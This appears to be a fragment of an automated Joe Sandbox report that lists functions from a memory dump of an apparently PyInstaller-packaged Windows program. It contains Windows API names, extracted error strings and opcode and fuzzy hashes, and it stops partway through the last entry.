                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                      • String ID: Needs to remove its temporary files.
                                                                                                      • API String ID: 3975851968-2863640275
                                                                                                      • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                      • Instruction ID: 9f023f5506a65efcbbc61d387c866c558f1fc11dd8f43295ecf38c6956f5b8d6
                                                                                                      • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                      • Instruction Fuzzy Hash: D0217421B08A4A85EF55AB7EB944179E251EFC9B90FDC4131DA1D43394DE2CD5928730
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: -$:$f$p$p
                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                      • Instruction ID: 06b00cb6f56a46cc2597f3191b5db7095b21a86aef13cbe70e80d5bd0e2aee89
                                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                      • Instruction Fuzzy Hash: 5F127361E0824B96FF247E14F156279B663FBD0758FCC4135E68946AC4EB3CE9828B24
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: f$f$p$p$f
                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                      • Instruction ID: fac8e087bd1863bef2f0bf8d98c5e4ff3b72cbfad6308f945ff96fbc4496140a
                                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                      • Instruction Fuzzy Hash: BC127362E2C14B85FF206A14F0566B9F6A3FBC0754FDC4135D69A469C4FB7CE482AB20
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                      • Opcode ID: 6d51f34c794bbbfabd010e9d79074d2913e3d6d5580974bb5eee722f2f2068a3
                                                                                                      • Instruction ID: 08d6b60d23c567f0ccfb6556cae1fb93e99b82bd15f2239f524f531de9b6f2ee
                                                                                                      • Opcode Fuzzy Hash: 6d51f34c794bbbfabd010e9d79074d2913e3d6d5580974bb5eee722f2f2068a3
                                                                                                      • Instruction Fuzzy Hash: CD417F61A18A5E82EE14FB26B8015B9E391BFC5BC4FD84432ED4C07795EE3CE5038760
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                      • Opcode ID: a0a178d7272ea433d8d829a323d9075ddbd8b07179643401fbe62e0b5b1ec9d7
                                                                                                      • Instruction ID: 199ccf7a2124ed4a6fc8f096456d134667b19cf22b69169b0b52298f93763cfd
                                                                                                      • Opcode Fuzzy Hash: a0a178d7272ea433d8d829a323d9075ddbd8b07179643401fbe62e0b5b1ec9d7
                                                                                                      • Instruction Fuzzy Hash: 1B417122A18A4E85EE10FB26B5015B9E3A1BFC5794FC84532ED4D07B95EE3CE5039B24
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 849930591-393685449
                                                                                                      • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                      • Instruction ID: e8c5c33e1a3adae8a7db270fa352507bbd532fa408bce3e34af680e1bf5359be
                                                                                                      • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                      • Instruction Fuzzy Hash: 91D1A432A0874D8AEF20AF25E4403ADB7A0FB85788F580235DE4D57799DF38E556C714
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF757133706,?,00007FF757133804), ref: 00007FF757132C9E
                                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF757133706,?,00007FF757133804), ref: 00007FF757132D63
                                                                                                      • MessageBoxW.USER32 ref: 00007FF757132D99
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                      • API String ID: 3940978338-251083826
                                                                                                      • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                      • Instruction ID: 354e6ac69fef1d5b1de96a26fc07b31a53819ffce3d11b2b298b5ac2d77a97a7
                                                                                                      • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                      • Instruction Fuzzy Hash: C231F862B08B4942EA20BB25B9006BAA691BFC4798F840136EF4D97759EF3CD507C710
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF75713DF7A,?,?,?,00007FF75713DC6C,?,?,?,00007FF75713D869), ref: 00007FF75713DD4D
                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF75713DF7A,?,?,?,00007FF75713DC6C,?,?,?,00007FF75713D869), ref: 00007FF75713DD5B
                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF75713DF7A,?,?,?,00007FF75713DC6C,?,?,?,00007FF75713D869), ref: 00007FF75713DD85
                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF75713DF7A,?,?,?,00007FF75713DC6C,?,?,?,00007FF75713D869), ref: 00007FF75713DDF3
                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF75713DF7A,?,?,?,00007FF75713DC6C,?,?,?,00007FF75713D869), ref: 00007FF75713DDFF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                      • Instruction ID: 6aa6b347135eb56b6d49643277da36553448b57188c1708d06e3eae03210da90
                                                                                                      • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                      • Instruction Fuzzy Hash: 81319021B1A65E91EE15AB16B4005B5B3A4FF88BE4FDD4535ED5D0A380EF3CE4468320
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                      • API String ID: 2050909247-2434346643
                                                                                                      • Opcode ID: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
                                                                                                      • Instruction ID: e6b82b634fe0d061cba84443a23880d789da52a8fa3ee8c2fd024006ef6d9566
                                                                                                      • Opcode Fuzzy Hash: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
                                                                                                      • Instruction Fuzzy Hash: D0417E31A19A8F91EE25FF24F4141E9A361FB94384FD80132DA5D47699EF3CE606C760
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF75713351A,?,00000000,00007FF757133F23), ref: 00007FF757132AA0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                      • API String ID: 2050909247-2900015858
                                                                                                      • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                      • Instruction ID: 58947d03d114d235df626371e312e2ef73fb29a18dc8b372a81f0f1b7ef899b7
                                                                                                      • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                      • Instruction Fuzzy Hash: ED21A132A19B8982EB20EB55B8417E6A394FBC87C4F840132EE8C43659EF3CD2468650
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                                                                      • Instruction ID: bdd30c0839a7d920fa3fd5c50c2fea6cd6cf0a5f6aba6c5113bf824948128e57
                                                                                                      • Opcode Fuzzy Hash: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                                                                      • Instruction Fuzzy Hash: 22213C20E0C28A41FE687365BA56139D2675FC4BA0F9C4734D92E47AC6ED2DA4038720
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                      • Instruction ID: 9344e527efd1a51273b0bb914241e040fb2ef271cb4a7ec947e7e3100d2b84c5
                                                                                                      • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                      • Instruction Fuzzy Hash: EB11DA21B18B4586EB60AB56F845339E3A0FBC8BE4FC84234D95D87794DF3CD8058B10
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF757133FB1), ref: 00007FF757138EFD
                                                                                                      • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF757133FB1), ref: 00007FF757138F5A
                                                                                                        • Part of subcall function 00007FF757139390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7571345F4,00000000,00007FF757131985), ref: 00007FF7571393C9
                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF757133FB1), ref: 00007FF757138FE5
                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF757133FB1), ref: 00007FF757139044
                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF757133FB1), ref: 00007FF757139055
                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF757133FB1), ref: 00007FF75713906A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 3462794448-0
                                                                                                      • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                      • Instruction ID: d61deaf6d17d15d4d7efcf0414626ec1944a8a755d18debc29bf6cf60d7dd9c2
                                                                                                      • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                      • Instruction Fuzzy Hash: 4C419572A1968E82EE30AB11B5442BAB395FBC5BD4F884135DF8E57789DE3CD502C720
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF757144F11,?,?,?,?,00007FF75714A48A,?,?,?,?,00007FF75714718F), ref: 00007FF75714B2D7
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF757144F11,?,?,?,?,00007FF75714A48A,?,?,?,?,00007FF75714718F), ref: 00007FF75714B30D
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF757144F11,?,?,?,?,00007FF75714A48A,?,?,?,?,00007FF75714718F), ref: 00007FF75714B33A
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF757144F11,?,?,?,?,00007FF75714A48A,?,?,?,?,00007FF75714718F), ref: 00007FF75714B34B
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF757144F11,?,?,?,?,00007FF75714A48A,?,?,?,?,00007FF75714718F), ref: 00007FF75714B35C
                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF757144F11,?,?,?,?,00007FF75714A48A,?,?,?,?,00007FF75714718F), ref: 00007FF75714B377
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                                                                      • Instruction ID: 944780677ed88540fa4e8c94ead769f4185f24d4704054091b42e3e4fc7a3044
                                                                                                      • Opcode Fuzzy Hash: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                                                                      • Instruction Fuzzy Hash: 53112960E0C64A82FE687726B65613D92579FC47A0F9C8734D92E47BD6EE2DA4034720
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF757131B6A), ref: 00007FF75713295E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                      • API String ID: 2050909247-2962405886
                                                                                                      • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                      • Instruction ID: a437ccb3633407a9152bf9ce38520acc8899512b0b1c60eb7ac53ff607133b5f
                                                                                                      • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                      • Instruction Fuzzy Hash: 9431F822B18A8992EB20B765B8416F6A295BFC87D4F880132EE8D83745EF3CD1478710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                      • String ID: Unhandled exception in script
                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                      • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
